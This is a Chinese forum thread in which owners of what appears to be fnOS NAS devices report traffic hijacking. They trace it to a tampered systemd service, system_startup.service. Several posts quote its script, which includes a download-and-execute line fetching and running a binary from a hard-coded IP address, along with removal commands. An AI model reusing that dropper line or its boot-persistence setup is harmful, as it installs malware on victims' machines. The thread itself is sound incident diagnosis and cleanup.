飞牛里面指向这个域名IP，6000+连接数。

ERP工程师李

设备环境：（物理机/虚拟机、局域网/公网/反代/域名/P2P、系统/APP版本号、若为移动端/TV请提供手机/电视型号跟系统版本）

BUG现象：（我通过xx设备访问，经过xxx操作后，出现了xxx情况，若有现场截图或者视频可以上传）

出现频率：（偶现/必现）

联系方式：（可以提供手机号或者所在粉丝群与昵称，例如 1群-路人甲）

日志文件：（系统BUG进入日志应用-更多-系统诊断日志-上传到社区；APP端bug进入-设置-APP日志上报-上报后提供设备ID-）

附件过大无法上传可以通过飞牛外链分享或者百度网盘提供日志文件

<官方授权或自有硬件的用户，可直接联系客服，享一对一服务>

飞牛技术同学

遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用
建议升级到最新的1.1.15系统版本，确保外网访问使用https方式，关闭非必要的端口。

如果还会出现，可与我们联系。

千岛x

飞牛技术同学 发表于 2026-1-26 19:13
遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用
建议升级到最新的1.1.15系统版本，确保外网访问 ...

这个情况也就近期开始出现，大量异常连接数，开始还没在意是什么问题，宽带总是一段时间就断一下，然后就开始排查问题，每次断网在路由系统里能看到飞牛大量连接数，每次在2万到4万之间，这很不正常，爱快显示是迅雷或者BT，我就把所有相关的应用全部删除，但问题并没有解决，据我观察每次的IP都不一样，有很多网游的数据连接 比如魔兽世界还有天龙八部之类的，一旦飞牛系统被大量异常连接，会导致系统出现卡顿，资源管理器加载失败,如果有需要我可以配合官方尽快修复该问题

pizizhuo

我的也是，飞牛已经升级到最新1.1.15 还是出现。发现临近18点的时候出现 。下次出现准备抓个包看看

Xin_yZ1b9

我以为是我自己呢，我刚刚去爱快论坛有很多这样人。我一天4-5次

pizizhuo

17点半更新手机软件下载连接数都未异常，从50分左右网络直接瘫痪了。是不是来一波真是醉了再这样要关掉飞牛了

mizl

我的也是，飞牛已经升级到最新1.1.15 还是出现。

liondj_ersJ1

好像就晚上七点左右开始 8点多到10点多高峰期间 连接数很高

花村游戏厅

我也发现这个问题，上传直接到千m，但是我实际带宽上传没这个高

方得自孤

竟然不是个例！！！最近经常感觉断流，以为是网卡有问题，查了ikuai发现飞牛所在的ip连接数异常，白天偶发，晚高峰频发，最高连接数高达10w，短时间转发包数百万

pizizhuo

今天8点又来一波，蹲不到碰见的时间。现在全部关了端口映射。再观察观察一下

Xin_yZ1b9

pizizhuo 发表于 2026-1-30 00:03
今天8点又来一波，蹲不到碰见的时间。现在全部关了端口映射。再观察观察一下 ...

没有用，是飞牛系统问题

kemeng

我的也出现这个问题，晚上网络断断续续的，一看爱快飞牛连接数上万，最高到过9.8万。怀疑被跑pcdn了。我把docker和飞牛应用卸载了很多，今晚再观察下。

kemeng

连接指向的有迅雷，腾讯游戏，快手视频等等，明显pcdn的数据。

liondj_ersJ1

liiecho

是被挂马了，我已经拿到脚本了 可以查看一下是否有这个服务system_startup.service

liiecho

飞牛技术同学 发表于 2026-1-26 19:13
遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用
建议升级到最新的1.1.15系统版本，确保外网访问 ...

我一直都是最新系统，并且感觉是用了最新系统出现的这个问题。在系统启动项中 找到了system_startup.service这个服务，查看内容后就是标准的木马程序。在这之前没开启过ssh 没拿过root用户，没有使用过p2p或者种子下载，只下载一个第三方软件，名称是FnDepot。辛苦给排查下，出现的情况是 出现大量的连接数，时间基本固定，晚高峰附近进一个周。一天跑了50g上传流量。大量的docker应用出现自动关闭的情况。cpu负载一直在50%左右，查看top无法找到明确的占用。

排骨排骨啊

我最近1个月也碰到这个问题，每天有2-3波，平均一天20-30G上行流量，查了下进程也没system_startup.service这个服务

凉城殇

我也是，上周五出现过一次，今天又出现了

凉城殇

飞牛技术同学 发表于 2026-1-26 19:13
遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用
建议升级到最新的1.1.15系统版本，确保外网访问 ...

有没有什么解决方案

排骨排骨啊

飞牛技术同学 发表于 2026-1-26 19:13
遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用
建议升级到最新的1.1.15系统版本，确保外网访问 ...

我系统也是1.1.15，外网端口映射都没开，也没什么特别的应用，可以说几乎未使用，就在pve中安装了个系统，经常刷新更新下系统。还未正式使用！

排骨排骨啊

pizizhuo 发表于 2026-1-28 23:46
17点半更新手机软件下载连接数都未异常，从50分左右网络直接瘫痪了。是不是来一波真是醉了再这样要关掉飞牛 ...

我已经关机了，出现时候由于连接数太多，网络直接卡死！

liiecho

排骨排骨啊 发表于 2026-1-30 16:38
我最近1个月也碰到这个问题，每天有2-3波，平均一天20-30G上行流量，查了下进程也没system_startup.service ...

是要去ssh中查看 服务

排骨排骨啊

ssh查看了也无此服务

kemeng

很奇怪，爱快上看连接数很高上行带宽跑满了，飞牛里边网速显示还是几十KB

esinlove

[quote][size=2][url=forum.php?mod=redirect&goto=findpost&pid=241338&ptid=52067][color=#999999]飞牛技术同学 发表于 2026-1-26 19:13[/color][/url][/size] 遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用 建议升级到最新的1.1.15系统版本，确保外网访问 ...[/quote]

杨斌x

千岛x 发表于 2026-1-27 22:37
这个情况也就近期开始出现，大量异常连接数，开始还没在意是什么问题，宽带总是一段时间就断一下，然后就 ...

对，我和你一模一样，要不就是显示魔兽**，要不就是迅雷，我压根都没用。而且连接数是数十万。

Xin_yZ1b9

[quote][size=2][url=forum.php?mod=redirect&goto=findpost&pid=241338&ptid=52067][color=#999999]飞牛技术同学 发表于 2026-1-26 19:13[/color][/url][/size] 遇到这个情况，怀疑因公网明文访问，设备被异常访问或利用 建议升级到最新的1.1.15系统版本，确保外网访问 ...[/quote]

下面是进程脚本内容，真是被当肉**了

ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 root root 220 Jan 23 19:43 /etc/systemd/system/system_startup.service
root@xin:~# cat /etc/systemd/system/system_startup.service
[Unit]
Description=Run custom script After trim_main
After=trim_main.service

[Service]
Type=oneshot
ExecStart=/usr/trim/bin/system_startup.sh
TimeoutStopSec=3
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

root@xin:~# cat /usr/trim/bin/system_startup.sh
#!/bin/bash

STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"

if [ ! -f "$BACKUP" ]; then
if [ -f "$STATUS" ]; then
cp "​STATUS" "BACKUP"
fi
fi

if [ ! -f "$STATUS" ]; then
if [ -f "$BACKUP" ]; then
cp "​BACKUP" "STATUS"
fi
fi

rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
root@xin:# systemctl stop system_startup.service
root@xin:# systemctl disable system_startup.service
Removed "/etc/systemd/system/multi-user.target.wants/system_startup.service".
root@xin:# rm -f /usr/trim/bin/system_startup.sh
rm: cannot remove '/usr/trim/bin/system_startup.sh': Operation not permitted
root@xin:# rm -f /etc/systemd/system/system_startup.service
root@xin:~# rm -f /etc/systemd/system/multi-user.target.wants/system_startup.service

Xin_yZ1b9

liiecho 发表于 2026-1-30 12:46
是被挂马了，我已经拿到脚本了 可以查看一下是否有这个服务system_startup.service
...

ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 root root 220 Jan 23 19:43 /etc/systemd/system/system_startup.service
root@xin:~# cat /etc/systemd/system/system_startup.service
[Unit]
Description=Run custom script After trim_main
After=trim_main.service

[Service]
Type=oneshot
ExecStart=/usr/trim/bin/system_startup.sh
TimeoutStopSec=3
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

root@xin:~# cat /usr/trim/bin/system_startup.sh
#!/bin/bash

STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"


if [ ! -f "$BACKUP" ]; then
    if [ -f "$STATUS" ]; then
        cp "$STATUS" "$BACKUP"
    fi
fi

if [ ! -f "$STATUS" ]; then
    if [ -f "$BACKUP" ]; then
        cp "$BACKUP" "$STATUS"
    fi
fi

rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
root@xin:~# systemctl stop system_startup.service
root@xin:~# systemctl disable system_startup.service
Removed "/etc/systemd/system/multi-user.target.wants/system_startup.service".
root@xin:~# rm -f /usr/trim/bin/system_startup.sh
rm: cannot remove '/usr/trim/bin/system_startup.sh': Operation not permitted
root@xin:~# rm -f /etc/systemd/system/system_startup.service
root@xin:~# rm -f /etc/systemd/system/multi-user.target.wants/system_startup.service

liiecho

Xin_yZ1b9 发表于 2026-1-30 22:18
ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 root root 220 Jan 23 19:43 /etc/syst ...

是的 希望官方大大能看到，给统一修复一下这个问题，按照我的调查这个文件是被篡改了，而不是新增的。

Xin_yZ1b9

我删除了 屏蔽了这个IP

root@xin:# ss -antp | grep 151.240.13.91
root@xin:# ls -l /etc/systemd/system/system_startup.service 2>/dev/null
root@xin:# ls -l /etc/systemd/system/multi-user.target.wants/system_startup.service 2>/dev/null
root@xin:# ss -antp | grep 151.240.13.91
root@xin:~#

排骨排骨啊

Xin_yZ1b9 发表于 2026-1-30 22:17
下面是进程脚本内容，真是被当肉**了
ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 r ...

多谢！按你这个教程移除了

momo_QZ1Zj

Xin_yZ1b9 发表于 2026-1-30 22:18
ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 root root 220 Jan 23 19:43 /etc/syst ...

cat /usr/trim/bin/system_startup.sh
#!/bin/bash

STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"


if [ ! -f "$BACKUP" ]; then
    if [ -f "$STATUS" ]; then
        cp "$STATUS" "$BACKUP"
    fi
fi

if [ ! -f "$STATUS" ]; then
    if [ -f "$BACKUP" ]; then
        cp "$BACKUP" "$STATUS"
    fi
fi

rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

我只有上面这些内容，是不是我没事

凉城殇

Xin_yZ1b9 发表于 2026-1-30 22:18
ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 root root 220 Jan 23 19:43 /etc/syst ...

怎么解决

冲冲冲

momo_QZ1Zj 发表于 2026-1-31 11:24
cat /usr/trim/bin/system_startup.sh
#!/bin/bash

是的，我的也是这样

不世道

momo_QZ1Zj 发表于 2026-1-31 11:24
cat /usr/trim/bin/system_startup.sh
#!/bin/bash

我也这样，先断网看两天